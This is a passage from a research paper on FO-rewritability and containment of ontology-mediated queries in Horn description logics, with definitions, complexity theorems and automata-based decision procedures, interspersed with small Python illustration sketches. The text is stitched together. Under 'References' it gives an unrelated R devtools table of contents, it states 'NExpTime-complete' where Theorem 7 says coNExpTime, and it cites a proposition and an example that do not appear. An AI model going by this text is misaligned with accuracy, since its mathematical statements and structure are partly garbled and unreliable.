(which tend to be very small) while it is only single exponential in the size of the ontologies. We also show that the complexity drops to \textsc{NExpTime}-complete [...]. An \(\mathcal{ELI}(\mathcal{F}_n)\) TBox is a Horn-\(\mathcal{SHIF}\) TBox that contains neither transitivity assertions nor disjunctions in CIs, an \(\mathcal{ELI}\) TBox is an \(\mathcal{ELI}(\mathcal{F}_n)\) TBox that contains neither functionality assertions nor RIs, and an \(\mathcal{EL}(\mathcal{F}_n)\) TBox is an \(\mathcal{ELI}(\mathcal{F}_n)\) TBox that does not contain inverse roles.
An ABox is a finite set of concept assertions \(A(a)\) and role assertions \(r(a, b)\) where \(A\) is a concept name, \(r\) a role name, and \(a, b\) individual names from a countably infinite set \(N_I\). We sometimes write \(r^{-1}(a, b)\) instead of \(r(b, a)\) and use \(\text{Ind}(A)\) to denote the set of all individual names used in \(A\). A signature is a set of concept and role names. We will often assume that the ABox is formulated in a prescribed signature, which we then call an ABox signature. An ABox that only uses concept and role names from a signature \(\Sigma\) is called a \(\Sigma\)-ABox.
The semantics of DLs is given in terms of interpretations \(I = (\Delta^I, \cdot^I)\), where \(\Delta^I\) is a non-empty set (the domain) and \(\cdot^I\) is the interpretation function, assigning to each \(A \in N_c\) a set \(A^I \subseteq \Delta^I\) and to each \(r \in N_r\) a relation \(r^I \subseteq \Delta^I \times \Delta^I\). The interpretation \(C^I \subseteq \Delta^I\) of a concept \(C\) in \(I\) is defined as usual, see [Baader et al., 2003]. An interpretation \(I\) satisfies a CI \(C \sqsubseteq D\) if \(C^I \subseteq D^I\), a functionality assertion \(\text{func}(r)\) if \(r^I\) is a partial function, a transitivity assertion \(\text{trans}(r)\) if \(r^I\) is transitive, an RI \(r \sqsubseteq s\) if \(r^I \subseteq s^I\), a concept assertion \(A(a)\) if \(a^I \in A^I\), and a role assertion \(r(a, b)\) if \((a^I, b^I) \in r^I\). We say that \(I\) is a model of a TBox or an ABox if it satisfies all inclusions and assertions in it. An ABox \(A\) is consistent with a TBox \(T\) if \(A\) and \(T\) have a common model. If \(\alpha\) is a CI, RI, or functionality assertion, we write \(T \models \alpha\) if all models of \(T\) satisfy \(\alpha\).
A conjunctive query (CQ) takes the form \(q = \exists x. \varphi(x, y)\) with \(x, y\) tuples of variables and \(\varphi\) a conjunction of atoms of
the form $A(x)$ and $r(x, y)$ that uses only variables from $x \cup y$. The variables in $y$ are called answer variables, the arity of $q$ is the length of $y$, and $q$ is Boolean if it has arity zero. An atomic query ($AQ$) is a conjunctive query of the form $A(x)$. A union of conjunctive queries ($UCQ$) is a disjunction of CQs that share the same answer variables. Ontology-mediated queries (OMQs) and the notation $(\mathcal{L}, Q)$ for OMQ languages were already defined in the introduction. We generally assume that if a role $r$ occurs in $q$ and $T \models s \subseteq r$, then trans$(s) \notin T$. This is common since allowing transitive roles in the query poses serious additional complications, which are outside the scope of this paper; see e.g. [Bienvenu et al., 2010; Gottlob et al., 2013].
Let $Q = (T, \Sigma, q)$ be an OMQ, $q$ of arity $n$, $A$ a $\Sigma$-ABox and $a \in \text{Ind}(A)^n$. We write $A \models Q(a)$ if $I \models q(a)$ for all models $I$ of $T$ and $A$. In this case, $a$ is a certain answer to $Q$ on $A$. We use $\text{cert}(Q, A)$ to denote the set of all certain answers to $Q$ on $A$.
A first-order query (FOQ) is a first-order formula $\varphi$ constructed from atoms $A(x), r(x, y)$, and $x = y$; here, concept names are viewed as unary predicates, role names as binary predicates, and predicates of other arity, function symbols, and constant symbols are not permitted. We write $\varphi(x)$ to indicate that the free variables of $\varphi$ are among $x$ and call $x$ the answer variables of $\varphi$. The number of answer variables is the arity of $\varphi$ and $\varphi$ is Boolean if it has arity zero. We use $\text{ans}(\mathcal{I}, \varphi)$ to denote the set of answers to the FOQ $\varphi$ on the interpretation $\mathcal{I}$; that is, if $\varphi$ is $n$-ary, then $\text{ans}(\mathcal{I}, \varphi)$ contains all tuples $d \in (\Delta^{\mathcal{I}})^n$ with $\mathcal{I} \models \varphi(d)$. To bridge the gap between certain answers and answers to FOQs, we sometimes view an ABox $A$ as an interpretation $\mathcal{I}_A$, defined in the obvious way.
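To make the query-evaluation notions concrete, a CQ can be evaluated on a finite interpretation by brute-force homomorphism search. The following Python sketch is our own illustration (representation and helper name are not from the paper): concept and role extensions are given as sets, atoms as tuples.

```python
from itertools import product

def cq_answers(domain, concepts, roles, atoms, answer_vars):
    # Atoms are tuples ("A", "x") for concept atoms and ("r", "x", "y")
    # for role atoms; concepts/roles map predicate names to extensions.
    variables = sorted({v for atom in atoms for v in atom[1:]})
    answers = set()
    for values in product(sorted(domain), repeat=len(variables)):
        h = dict(zip(variables, values))  # candidate homomorphism
        if all(
            h[args[0]] in concepts.get(pred, set()) if len(args) == 1
            else (h[args[0]], h[args[1]]) in roles.get(pred, set())
            for pred, *args in atoms
        ):
            answers.add(tuple(h[v] for v in answer_vars))
    return answers
```

For instance, evaluating $q_0(x, y) = B(x) \wedge r(x, y) \wedge A(y)$ on the interpretation with $B = \{a\}$, $r = \{(a, b)\}$, $A = \{b\}$ yields the single answer $(a, b)$.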
For any syntactic object $O$ (such as a TBox, a query, an OMQ), we use $|O|$ to denote the size of $O$, that is, the number of symbols needed to write it (concept and role names counted as a single symbol).
**Definition 1** (FO-rewriting). An FOQ $\varphi$ is an FO-rewriting of an OMQ $Q = (T, \Sigma, q)$ if $\text{cert}(Q, A) = \text{ans}(\mathcal{I}_A, \varphi)$ for all $\Sigma$-ABoxes $A$ that are consistent with $T$. If there is such a $\varphi$, then $Q$ is FO-rewritable.
**Example 2.** (1) Let $Q_0 = (T_0, \Sigma_0, q_0(x, y))$, where $T_0 = \{ \exists r. A \sqsubseteq A, B \sqsubseteq \forall r. A \}$, $\Sigma_0 = \{ r, A, B \}$ and $q_0(x, y) = B(x) \wedge r(x, y) \wedge A(y)$. Then $\varphi_0(x, y) = B(x) \wedge r(x, y)$ is an FO-rewriting of $Q_0$.
We will see in Example 10 that the query $Q_A$ obtained from $Q_0$ by replacing $q_0(x, y)$ with the AQ $A(x)$ is not FO-rewritable (due to the unbounded propagation of $A$ via $r$-edges by $T_0$). Thus, an FO-rewritable OMQ can give rise to AQ `subqueries' that are not FO-rewritable.
(2) Let $Q_1 = (T_1, \Sigma_1, q_1(x))$, where $T_1 = \{ \exists r. \exists r. A \sqsubseteq \exists r. A \}$, $\Sigma_1 = \{ r, A \}$, and $q_1(x) = \exists y(r(x, y) \wedge A(y))$. Then $Q_1$ is not FO-rewritable (see again Example 10), but all AQ subqueries that $Q_1$ gives rise to are FO-rewritable.
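To make Example 2(1) concrete: on the $\Sigma_0$-ABox $A = \{B(a), r(a, b)\}$, the TBox $T_0$ entails $A(b)$, so $(a, b)$ is a certain answer to $Q_0$; the rewriting $\varphi_0$ retrieves it by plain query evaluation on $A$, with no reasoning at run time. A minimal sketch (our own extensional encoding of the ABox):

```python
# Σ0-ABox A = {B(a), r(a, b)}, represented extensionally.
B = {"a"}
r = {("a", "b")}

# Evaluate the FO-rewriting φ0(x, y) = B(x) ∧ r(x, y) directly on A;
# no A-assertion for b is needed, since φ0 already accounts for T0.
rewriting_answers = {(x, y) for (x, y) in r if x in B}
print(rewriting_answers)
```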
The main reasoning problem studied in this paper is to decide whether a given OMQ $Q = (T, \Sigma, q)$ is FO-rewritable. We assume without loss of generality that every symbol in $\Sigma$ occurs in $T$ or in $q$. We obtain different versions of this problem by varying the OMQ language used. Note that we have defined FO-rewritability relative to ABoxes that are consistent with the TBox. It is thus important for the user to know whether that is the case. Therefore, we also consider FO-rewritability of ABox inconsistency. More precisely, we say that ABox inconsistency is FO-rewritable relative to a TBox $T$ and ABox signature $\Sigma$ if there is a Boolean FOQ $\varphi$ such that for every $\Sigma$-ABox $A$, $A$ is inconsistent with $T$ iff $\mathcal{I}_A \models \varphi()$.
Apart from FO-rewritability questions, we will also study OMQ containment. Let $Q_i = (T_i, \Sigma_i, q_i)$, $i \in \{1, 2\}$, be two OMQs over the same ABox signature. We say that $Q_1$ is contained in $Q_2$, in symbols $Q_1 \subseteq Q_2$, if $\text{cert}(Q_1, A) \subseteq \text{cert}(Q_2, A)$ holds for all $\Sigma$-ABoxes $A$ that are consistent with $T_1$ and $T_2$.
We now make two basic observations that we use in an essential way in the remaining paper. We first observe that it suffices to concentrate on $\mathcal{ELIHF}_\bot$ TBoxes $T$ in normal form, that is, all CIs are of one of the forms $A \sqsubseteq \bot$, $A \sqsubseteq \exists r.B$, $\top \sqsubseteq A$, $B_1 \sqcap B_2 \sqsubseteq A$, $\exists r.B \sqsubseteq A$ with $A, B, B_1, B_2$ concept names and $r$ a role. We use $\text{sig}(T)$ to denote the concept and role names that occur in $T$.
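Normal form can be reached by the standard structural transformation: nested concepts on the left-hand side of a CI are flattened by introducing fresh concept names. The following Python sketch handles only left-nested existentials over a concept name (the representation, helper names, and fresh-name scheme are our own, not the paper's procedure):

```python
from itertools import count

def normalize(lhs, rhs, counter=None):
    """Split C ⊑ A, with C a possibly nested existential over a concept
    name, into normal-form CIs of shape ∃r.B ⊑ A' by introducing fresh
    names X0, X1, ... A concept is either a name (str) or a tuple
    ("exists", role, concept); a CI is a (lhs, rhs) pair."""
    counter = counter if counter is not None else count()
    out = []

    def name_of(c):
        # Replace a complex concept by a fresh name, emitting the CI
        # that defines the fresh name from below.
        if isinstance(c, str):
            return c
        fresh = f"X{next(counter)}"
        out.append((("exists", c[1], name_of(c[2])), fresh))
        return fresh

    if isinstance(lhs, str):
        out.append((lhs, rhs))
    else:
        out.append((("exists", lhs[1], name_of(lhs[2])), rhs))
    return out
```

For instance, $\exists r.\exists r.A \sqsubseteq B$ becomes $\exists r.A \sqsubseteq X_0$ and $\exists r.X_0 \sqsubseteq B$.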
**Proposition 3.** Given a Horn-$\mathcal{SHIF}$ (resp. $\mathcal{ELHF}_\bot$) TBox $T_1$ and ABox signature $\Sigma$, one can construct in polynomial time an $\mathcal{ELIHF}_\bot$ (resp. $\mathcal{ELHF}_\bot$) TBox $T_2$ in normal form such that for every $\Sigma$-ABox $A$,
1. $A$ is consistent with $T_1$ iff $A$ is consistent with $T_2$;
2. if $A$ is consistent with $T_1$, then for any CQ $q$ that does not use symbols from $\text{sig}(T_2) \setminus \text{sig}(T_1)$, we have $\text{cert}(Q_1, A) = \text{cert}(Q_2, A)$, where $Q_i = (T_i, \Sigma, q)$ for $i \in \{1, 2\}$.
Proposition 3 yields polytime reductions of FO-rewritability in (Horn-$\mathcal{SHIF}$, $Q$) to FO-rewritability in ($\mathcal{ELIHF}_\bot$, $Q$) for any query language $Q$, and likewise for OMQ containment and FO-rewritability of ABox inconsistency. It also tells us that, when working with $\mathcal{ELIHF}_\bot$ TBoxes, we can assume normal form. Note that transitioning from (Horn-$\mathcal{SHF}$, $Q$) to ($\mathcal{ELHF}_\bot$, $Q$) is not as easy as in the case with inverse roles, since universal restrictions on the right-hand side of concept inclusions cannot easily be eliminated; for this reason, we do not consider (Horn-$\mathcal{SHF}$, $Q$). From now on, we work with TBoxes formulated in $\mathcal{ELIHF}_\bot$ or $\mathcal{ELHF}_\bot$ and assume without further notice that they are in normal form.
Our second observation is that, when deciding FO-rewritability, we can restrict our attention to connected queries provided that we have a way of deciding containment (for potentially disconnected queries). We use conCQ to denote the class of all connected CQs.
**Theorem 4.** Let $\mathcal{L} \in \{ \mathcal{ELIHF}_\bot, \mathcal{ELHF}_\bot \}$. Then FO-rewritability in $(\mathcal{L}, \text{CQ})$ can be solved in polynomial time when there is access to oracles for containment in $(\mathcal{L}, \text{CQ})$ and for FO-rewritability in $(\mathcal{L}, \text{conCQ})$.
To prove Theorem 4, we observe that FO-rewritability of an OMQ $Q = (T, \Sigma, q)$ is equivalent to FO-rewritability of all OMQs $Q_e = (T, \Sigma, q_e)$ with $q_e$ a maximal connected component of $q$, excluding certain redundant such components (which can be identified using containment). Backed by Theorem 4, we generally assume connected queries when studying FO-rewritability, which allows us to avoid unpleasant technical complications and is a main reason for studying FO-rewritability and containment in the same paper.
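The decomposition behind Theorem 4 needs the maximal connected components of a CQ, i.e., the groups of atoms linked by chains of shared variables. A union-find sketch, in our own atom representation:

```python
def connected_components(atoms):
    # Atoms are tuples (pred, *vars); two atoms lie in the same
    # component iff they are linked by a chain of shared variables.
    parent = {}

    def find(x):
        # Union-find lookup with path shortening.
        root = x
        while parent.setdefault(root, root) != root:
            root = parent[root]
        parent[x] = root
        return root

    # Union all variables occurring in the same atom.
    for _, *vs in atoms:
        for v in vs[1:]:
            parent[find(vs[0])] = find(v)

    # Group atoms by the representative of their first variable.
    components = {}
    for atom in atoms:
        components.setdefault(find(atom[1]), []).append(atom)
    return list(components.values())
```

For example, $A(x) \wedge r(x, y) \wedge B(z)$ splits into the two components $\{A(x), r(x, y)\}$ and $\{B(z)\}$.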
3 Main Results
In this section, we summarize the main results established in this paper. We start with the following theorem.
**Theorem 5.** FO-rewritability and containment are
1. 2ExpTime-complete for any OMQ language between (ELI, CQ) and (Horn-$\mathcal{SHIF}$, CQ), and
2. ExpTime-complete for any OMQ language between (EL, AQ) and ($\mathcal{ELHF}_\bot$, CQ).
Moreover, given an OMQ from (Horn-$\mathcal{SHIF}$, CQ) that is FO-rewritable, one can effectively construct a UCQ-rewriting.
Like the subsequent results, Theorem 5 illustrates the strong relationship between FO-rewritability and containment. Note that inverse roles increase the complexity of both reasoning tasks. We stress that this increase takes place only when the actual queries are conjunctive queries, since FO-rewritability for OMQ languages with inverse roles and atomic queries is in ExpTime [Bienvenu et al., 2013].
The 2ExpTime-completeness result stated in Point 1 of Theorem 5 might look discouraging. However, the situation is not quite as bad as it seems. To show this, we state the upper bound underlying Point 1 of Theorem 5 a bit more carefully.
**Theorem 6.** Given OMQs $Q_i = (T_i, \Sigma_i, q_i), i \in \{1, 2\}$, from (Horn-$\mathcal{SHIF}$, CQ), it can be decided
1. in time $2^{2^{p(|q_1|)} \cdot p(|T_1|)}$ whether $Q_1$ is FO-rewritable and
2. in time $2^{2^{p(|q_1| + |q_2|)} \cdot p(|T_1| + |T_2|)}$ whether $Q_1 \subseteq Q_2$, for some polynomial $p$.
Note that the runtime is double exponential only in the size of the actual queries $q_1$ and $q_2$, while it is only single exponential in the size of the TBoxes $T_1$ and $T_2$. This is good news since the size of $q_1$ and $q_2$ is typically very small compared to the sizes of $T_1$ and $T_2$. For this reason, it can even be reasonable to assume that the sizes of $q_1$ and $q_2$ are constant, in the same way in which the size of the query is assumed to be constant in data complexity. Note that, under this assumption, Theorem 6 yields ExpTime upper bounds.
One other way to relativize the seemingly very high complexity stated in Point 1 of Theorem 5 is to observe that the lower bound proofs require the actual query to be Boolean or disconnected. In practical applications, though, typical queries are connected and have at least one answer variable. We call such CQs rooted and use rCQ to denote the class of all rooted CQs. Our last main result states that, when we restrict our attention to rooted CQs, then the complexity drops to coNExpTime.
**Theorem 7.** FO-rewritability and containment are coNExpTime-complete in any OMQ language between (EL, rCQ) and (Horn-$\mathcal{SHIF}$, rCQ).
4 Semantic Characterization
The upper bounds stated in Theorems 5 and 6 are established in two steps. We first give characterizations of FO-rewritability in terms of the existence of certain (almost) tree-shaped ABoxes, and then utilize this characterization to design decision procedures based on alternating tree automata. The semantic characterizations are of independent interest.
An ABox $A$ is tree-shaped if the undirected graph with nodes $\operatorname{Ind}(A)$ and edges $\{\{a, b\} \mid r(a, b) \in A\}$ is acyclic and connected and $r(a, b) \in A$ implies that (i) $s(a, b) \notin A$ for all $s \neq r$ and (ii) $s(b, a) \notin A$ for all role names $s$. For tree-shaped ABoxes $A$, we often distinguish an individual used as the root, denoted with $\rho_A$. $A$ is ditree-shaped if the directed graph with nodes $\operatorname{Ind}(A)$ and edges $\{(a, b) \mid r(a, b) \in A\}$ is a tree and $r(a, b) \in A$ implies (i) and (ii). The (unique) root of a ditree-shaped ABox $A$ is also denoted with $\rho_A$.
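Tree-shapedness can be checked directly: conditions (i) and (ii) forbid a second assertion between the same pair of individuals, and the remaining requirement is that the undirected graph is a tree. A sketch in Python (our own encoding; role assertions are triples (r, a, b), and the input is assumed non-empty):

```python
def is_tree_shaped(role_assertions):
    # Conditions (i)/(ii): at most one role assertion per unordered
    # pair, and no self-loops (a frozenset of size 1 reveals a loop).
    pairs = {frozenset((a, b)) for _, a, b in role_assertions}
    nodes = {x for _, a, b in role_assertions for x in (a, b)}
    if len(pairs) != len(role_assertions) or any(len(p) != 2 for p in pairs):
        return False
    # A connected undirected graph is acyclic iff |E| = |V| - 1.
    if len(pairs) != len(nodes) - 1:
        return False
    # Connectivity check via depth-first search.
    adjacency = {n: set() for n in nodes}
    for _, a, b in role_assertions:
        adjacency[a].add(b)
        adjacency[b].add(a)
    seen, stack = set(), [next(iter(nodes))]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(adjacency[n] - seen)
    return seen == nodes
```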
An ABox $A$ is a pseudo tree if it is the union of ABoxes $A_0, \ldots, A_k$ that satisfy the following conditions:
1. $A_1, \ldots, A_k$ are tree-shaped;
2. $k \leq |\operatorname{Ind}(A_0)|$;
3. $\operatorname{Ind}(A_i) \cap \operatorname{Ind}(A_0) = \{\rho_{A_i}\}$ for $1 \leq i \leq k$, and $\operatorname{Ind}(A_i) \cap \operatorname{Ind}(A_j) = \emptyset$ for $1 \leq i < j \leq k$.
We call $A_0$ the core of $A$ and $A_1, \ldots, A_k$ the trees of $A$. The width of $A$ is $|\operatorname{Ind}(A_0)|$, its depth is the depth of the deepest tree of $A$, and its outdegree is the maximum outdegree of the ABoxes $A_1, \ldots, A_k$. For a pseudo tree ABox $A$ and $\ell \geq 0$, we write $A|_{\leq \ell}$ to denote the restriction of $A$ to the individuals whose minimal distance from a core individual is at most $\ell$, and analogously for $A|_{> \ell}$. A pseudo ditree ABox is defined analogously to a pseudo tree ABox, except that $A_1, \ldots, A_k$ must be ditree-shaped.
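The restriction $A|_{\leq \ell}$ can be computed with a breadth-first search from the core: first determine each individual's minimal distance from a core individual, then keep only assertions whose individuals lie within distance $\ell$. A sketch over role assertions (r, a, b), in our own encoding; concept assertions would be filtered the same way:

```python
from collections import deque

def restrict_depth(role_assertions, core, max_depth):
    # Build an undirected adjacency map over the individuals.
    adjacency = {}
    for _, a, b in role_assertions:
        adjacency.setdefault(a, set()).add(b)
        adjacency.setdefault(b, set()).add(a)
    # BFS from all core individuals at once (minimal distances).
    dist = {c: 0 for c in core}
    queue = deque(core)
    while queue:
        n = queue.popleft()
        for m in adjacency.get(n, ()):
            if m not in dist:
                dist[m] = dist[n] + 1
                queue.append(m)
    keep = {x for x, d in dist.items() if d <= max_depth}
    return {t for t in role_assertions if t[1] in keep and t[2] in keep}
```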
When studying FO-rewritability and containment, we can restrict our attention to pseudo tree ABoxes, and even to pseudo ditree ABoxes when the TBox does not contain inverse roles. The following statement makes this precise for the case of containment. Its proof uses unraveling and compactness.
**Proposition 8.** Let $Q_i = (T_i, \Sigma_i, q_i), i \in \{1, 2\}$, be OMQs from ($\mathcal{ELIHF}_\bot$, CQ). Then $Q_1 \not\subseteq Q_2$ iff there is a pseudo tree $\Sigma$-ABox $A$ of outdegree at most $|T_1|$ and width at most $|q_1|$ that is consistent with both $T_1$ and $T_2$ and a tuple $a$ from the core of $A$ such that $A \models Q_1(a)$ and $A \not\models Q_2(a)$.
If $Q_1, Q_2$ are from ($\mathcal{ELHF}_\bot$, CQ), then we can find a pseudo ditree ABox with these properties.
We now establish a first version of the announced characterizations of FO-rewritability. Like Proposition 8, they are based on pseudo tree ABoxes.
**Theorem 9.** Let $Q = (T, \Sigma, q)$ be an OMQ from ($\mathcal{ELIHF}_\bot$, conCQ). If the arity of $q$ is at least one, then the following conditions are equivalent:
1. $Q$ is FO-rewritable;
2. there is a $k \geq 0$ such that for all pseudo tree $\Sigma$-ABoxes $A$ that are consistent with $T$ and of outdegree at most $|T|$ and width at most $|q|$: if $A \models Q(a)$ with $a$ from the core of $A$, then $A|_{\leq k} \models Q(a)$.
If $q$ is Boolean, this equivalence holds with (2.) replaced by
2'. there is a $k \geq 0$ such that for all pseudo tree $\Sigma$-ABoxes $A$ that are consistent with $T$ and of outdegree at most $|T|$ and of width at most $|q|$: if $A \models Q$, then $A|_{>0} \models Q$ or $A|_{\leq k} \models Q$.
If $Q$ is from ($\mathcal{ELHF}_\bot$, conCQ), then the above equivalences hold also when pseudo tree $\Sigma$-ABoxes are replaced with pseudo ditree $\Sigma$-ABoxes.
Theorem 11. Let $T$ be an $\mathcal{ELIHF}_{\bot}$ TBox. Then Theorem 9 still holds with the following modifications:
1. if $q$ is not Boolean or $T$ is an $\mathcal{ELHF}_{\bot}$ TBox, “there is a $k \geq 0$” is replaced with “for $k = |q| + 2^{4(|T|+|q|)^2}$”;
2. if $q$ is Boolean, “there is a $k \geq 0$” is replaced with “for $k = |q| + 2^{4(|T|+2|q|)^2}$”.
The proof of Theorem 11 uses a pumping argument based on derivations of concept names in the pumped ABox by $T$. Due to the presence of inverse roles, this is not entirely trivial and uses what we call transfer sequences, describing the derivation history at a point of an ABox. Together with the proof of Theorem 9, Theorem 11 gives rise to an algorithm that constructs actual rewritings when they exist.
5 Constructing Automata
We show that Proposition 8 and Theorem 11 give rise to automata-based decision procedures for containment and FO-rewritability that establish the upper bounds stated in Theorems 5 and 6. By Theorem 4, it suffices to consider connected queries in the case of FO-rewritability. We now observe that we can further restrict our attention to Boolean queries. We use BCQ (resp. conBCQ) to denote the class of all Boolean CQs (resp. connected Boolean CQs).
Lemma 12. Let $\mathcal{L} \in \{\mathcal{ELIHF}_{\bot}, \mathcal{ELHF}_{\bot}\}$. Then
1. FO-rewritability in $(L, \text{conCQ})$ can be reduced in polytime to FO-rewritability in $(L, \text{conBCQ})$;
2. Containment in $(L, \text{CQ})$ can be reduced in polytime to containment in $(L, \text{BCQ})$.
The decision procedures rely on building automata that accept pseudo tree ABoxes which witness non-containment and non-FO-rewritability as stipulated by Proposition 8 and Theorem 11, respectively. We first have to encode pseudo tree ABoxes in a suitable way.
A tree is a non-empty (and potentially infinite) set $T \subseteq \mathbb{N}^*$ closed under prefixes. We say that $T$ is $m$-ary if for every $x \in T$, the set $\{i \mid x \cdot i \in T\}$ is of cardinality at most $m$. For an alphabet $\Gamma$, a $\Gamma$-labeled tree is a pair $(T, L)$ with $T$ a tree and $L : T \to \Gamma$ a labeling function. Let $Q = (T, \Sigma, q)$ be an OMQ from $(\mathcal{ELIHF}_{\bot}, \text{conBCQ})$. We encode pseudo tree ABoxes of width at most $|q|$ and outdegree at most $|T|$ by $(|T| \cdot |q|)$-ary $\Sigma_e \cup \Sigma_N$-labeled trees, where $\Sigma_e$ is an alphabet used for labeling root nodes and $\Sigma_N$ is for non-root nodes.
The alphabet $\Sigma_e$ consists of all $\Sigma$-ABoxes $A$ such that $\text{Ind}(A)$ only contains individual names from a fixed set $\text{Ind}_{\text{core}}$ of size $|q|$ and $A$ satisfies all functionality statements in $T$. The alphabet $\Sigma_N$ consists of all subsets $\Theta \subseteq (N_c \cap \Sigma) \cup \{r, r^- \mid r \in N_r \cap \Sigma\}$.
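The two conditions on the encoding trees, prefix-closedness and bounded branching, are easy to check for a finite tree when each node is represented as a tuple over $\mathbb{N}$ (our own encoding, for illustration only):

```python
def is_m_ary_tree(nodes, m):
    # nodes: finite subset of ℕ* given as tuples of ints; the empty
    # tuple () is the root.
    nodes = set(nodes)
    # Prefix-closed: every proper prefix of a node is itself a node.
    prefix_closed = all(w[:i] in nodes for w in nodes for i in range(len(w)))
    # m-ary: every node has at most m children.
    branching_ok = all(
        sum(1 for w in nodes if len(w) == len(v) + 1 and w[: len(v)] == v) <= m
        for v in nodes
    )
    return bool(nodes) and prefix_closed and branching_ok
```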
To decide $Q_1 \subseteq Q_2$ for OMQs $Q_i = (T_i, \Sigma_i, q_i), i \in \{1, 2\}$, from $(\mathcal{ELIHF}_\bot, \text{BCQ})$, by Proposition 8 it suffices to decide whether $L(\mathcal{A}_Q) \cap L(\mathcal{A}_{Q_2}) \subseteq L(\mathcal{A}_{Q_1})$. Since this question can be polynomially reduced to a TWAPA emptiness check and the latter can be executed in time single exponential in the number of states, this yields the upper bounds for containment stated in Theorems 5 and 6.
To decide non-FO-rewritability of an OMQ $Q = (T, \Sigma, q)$ from $(\mathcal{ELIHF}_\bot, \text{conBCQ})$, by Theorem 11 we need to decide whether there is a pseudo tree $\Sigma$-ABox $\mathcal{A}$ of outdegree at most $|T|$ and width at most $|q|$ that is consistent with $T$ and satisfies (i) $A \models Q$, (ii) $A|_{>0} \not\models Q$, and (iii) $A|_{\leq k} \not\models Q$ where $k = |q| + 2^{4(|T|+2|q|)^2}$. For consistency with $T$ and for (i), we use the automaton $\mathcal{A}_Q$ from Proposition 13. To achieve (ii) and (iii), we amend the tree alphabet $\Sigma_e \cup \Sigma_N$ with additional labels that implement a counter which counts up to $k$ and annotate each node in the tree with its depth (up to $k$). We then complement $\mathcal{A}_Q$ (which for TWAPAs can be done in polynomial time), relativize the resulting automaton to all but the first level of the input ABox for (ii) and to the first $k$ levels for (iii), and finally intersect all automata and check emptiness. This yields the upper bounds for FO-rewritability stated in Theorems 5 and 6.
As remarked in the introduction, apart from FO-rewritability of an OMQ $(T, \Sigma, q)$ we should also be interested in FO-rewritability of ABox inconsistency relative to $T$ and $\Sigma$. We close this section by noting that an upper bound for this problem can be obtained from Point 2 of Proposition 13, since TWAPAs can be complemented in polynomial time. A matching lower bound can be found in [Bienvenu et al., 2013].
**Theorem 14.** In $\mathcal{ELIHF}_\bot$, FO-rewritability of ABox inconsistency is ExpTime-complete.
6 Rooted Queries and Lower Bounds
We first consider the case of rooted queries and establish the upper bound in Theorem 7.
**Theorem 15.** FO-rewritability and containment in $(\mathcal{ELIHF}_\bot, \text{rCQ})$ are in coNExpTime.
Because of space limitations, we confine ourselves to a brief sketch, concentrating on FO-rewritability. By Point 1 of Theorem 11, deciding non-FO-rewritability of an OMQ $Q = (T, \Sigma, q)$ from $(\mathcal{ELIHF}_\bot, \text{rCQ})$ comes down to checking the existence of a pseudo tree $\Sigma$-ABox $\mathcal{A}$ that is consistent with $T$ and such that $A \models Q(a)$ and $A|_{\leq k} \not\models Q(a)$ for some tuple of individuals $a$ from the core of $\mathcal{A}$, for some suitable $k$. Recall that $A \models Q(a)$ if and only if there is a homomorphism $h$ from $q$ to the pseudo tree-shaped canonical model of $T$ and $\mathcal{A}$ that takes the answer variables to $a$. Because $a$ is from the core of $\mathcal{A}$ and $q$ is rooted, $h$ can map existential variables in $q$ only to individuals from $A|_{\leq |q|}$ and to the anonymous elements in the subtrees below them. To decide the existence of $A$, we can thus guess $A|_{\leq |q|}$ together with sets of concept assertions about individuals in $A|_{\leq |q|}$ that can be inferred from $A$ and $T$, and from $A|_{\leq k}$ and $T$. We can then check whether there is a homomorphism $h$ as described, without access to the full ABoxes $\mathcal{A}$ and $A|_{\leq k}$. It remains to ensure that the guessed initial part $A|_{\leq |q|}$ can be extended to $\mathcal{A}$ such that the entailed concept assertions are precisely those that were guessed, by attaching tree-shaped ABoxes to individuals on level $|q|$. This can be done by a mix of guessing and automata techniques.
We next establish the lower bounds stated in Theorems 5 and 7. For Theorem 5, we only prove a lower bound for Point 1 as the one in Point 2 follows from [Bienvenu et al., 2013].
**Theorem 16.** Containment and FO-rewritability are
1. coNExpTime-hard in $(\mathcal{EL}, rCQ)$ and
2. 2ExpTime-hard in $(\mathcal{ELI}, \text{CQ})$.
The results for containment apply already when both OMQs share the same TBox.
Point 1 is proved by reduction of the problem of tiling a torus of exponential size, and Point 2 is proved by reduction of the word problem of exponentially space-bounded alternating Turing machines (ATMs). The proofs use queries similar to those introduced in [Lutz, 2008] to establish lower bounds on the complexity of query answering in the expressive OMQ languages $(\mathcal{ALCHI}, rCQ)$ and $(\mathcal{ALCHI}, CQ)$. A major difference to the proofs in [Lutz, 2008] is that we represent torus tilings / ATM computations in the ABox that witnesses non-containment or non-FO-rewritability, instead of in the ‘anonymous part’ of the model created by existential quantifiers. The proof of Point 2 of Theorem 16 can be modified to yield new lower bounds for monadic Datalog containment. Recall that the rule body of a Datalog program is a CQ. Tree-shapedness of a CQ $q$ is defined in the same way as for an ABox in Section 4, that is, $q$ viewed as an undirected graph must be a tree without multi-edges.
**Theorem 17.** For monadic Datalog programs which contain no EDB relations of arity larger than two and no constants, containment
1. in a rooted CQ is coNExpTime-hard;
2. in a CQ is 2ExpTime-hard, even when all rule bodies are tree-shaped.
Point 1 closes an open problem from [Chaudhuri and Vardi, 1994], where a coNExpTime upper bound for containment of a monadic Datalog program in a rooted UCQ was proved and the lower bound was left open. Point 2 further improves a lower bound from [Benedikt et al., 2012] which also does not rely on EDB relations of arity larger than two, but requires that rule bodies are not tree-shaped or constants are present (which, in this case, correspond to nominals in the DL world).
7 Conclusion
A natural next step for future work is to use the techniques developed here for devising practically efficient algorithms that construct actual rewritings, which was very successful in the AQ case [Hansen et al., 2015].
An interesting open theoretical question is the complexity of FO-rewritability and containment for the OMQ languages considered in this paper in the special case when the ABox signature contains all concept and role names.
**Acknowledgements.** Bienvenu was supported by ANR project PAGODA (12-JS02-007-01), Hansen and Lutz by ERC grant 647289, Wolter by EPSRC UK grant EP/M012646/1.
References
R topics documented:
- bash ......................................................... 2
- build ....................................................... 3
- build_manual ........................................... 4
- build_readme ............................................ 4
- build_site ............................................... 5
- build_vignettes ........................................ 5
- check ....................................................... 6
- check_failures .......................................... 9
- check_man ............................................... 9
- check_rhub ............................................. 10
- check_win ............................................... 11
- clean_vignettes ....................................... 12
- create .................................................... 13
- devtools ............................................... 13
- dev_mode ............................................... 15
- dev_sitrep ............................................. 15
- document ............................................... 16
- install ................................................... 17
- install_deps ............................................ 18
- lint ....................................................... 20
- load_all ............................................... 21
- missing_s3 ............................................ 23
- package_file .......................................... 23
- release ................................................. 24
